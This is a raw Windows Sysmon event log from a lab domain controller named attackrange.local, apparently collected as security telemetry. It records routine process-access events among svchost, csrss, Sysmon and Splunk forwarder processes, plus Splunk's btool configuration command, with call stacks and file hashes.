13:09:48.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429C-6000-6600-000000009A01}3824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-429C-6000-6500-000000009A01}37883808C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-429C-6000-6600-000000009A01}3824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.967{08A6967A-429C-6000-6600-000000009A01}3824C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-429C-6000-6500-000000009A01}3788C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429C-6000-6500-000000009A01}3788C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429C-6000-6500-000000009A01}3788C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-429C-6000-6400-000000009A01}37963800C:\Windows\system32\cmd.exe{08A6967A-429C-6000-6500-000000009A01}3788C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.960{08A6967A-429C-6000-6500-000000009A01}3788C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-429C-6000-6400-000000009A01}3796C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429C-6000-6400-000000009A01}3796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.946{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 